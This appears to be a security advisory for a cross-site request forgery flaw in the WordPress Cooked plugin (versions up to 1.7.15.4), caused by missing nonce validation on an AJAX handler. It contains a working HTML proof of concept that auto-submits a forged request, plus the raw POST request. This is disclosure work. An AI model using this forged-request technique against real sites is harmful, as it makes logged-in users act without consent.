WordPress Cooked Plugin <= 1.7.15.4 - Cross-Site Request Forgery to Get Recipe IDs

Description:

The Cooked plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 1.7.15.4 due to missing or incorrect nonce validation on the AJAX action handler. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication.

Steps to reproduce:

<html>
	<!-- CSRF PoC - Get Recipe IDs -->
	<body>
		<form action="https://target.tld/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="action" value="cooked&#95;get&#95;recipe&#95;ids" />
			<input type="submit" value="Submit request" />
		</form>
		<script>
			history.pushState('', '', '/');
			document.forms[0].submit();
		</script>
	</body>
</html>

PoC request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.tld
Cookie: [cookies]
Content-Length: 28
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0

action=cooked_get_recipe_ids

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

WordPress Cooked Plugin <= 1.7.15.4 - Cross-Site Request Forgery to Get Recipe IDs

Package

Affected versions

Patched versions

Description

Description:

Steps to reproduce:

PoC request:

Severity

CVSS base metrics

CVE ID

Weaknesses

Credits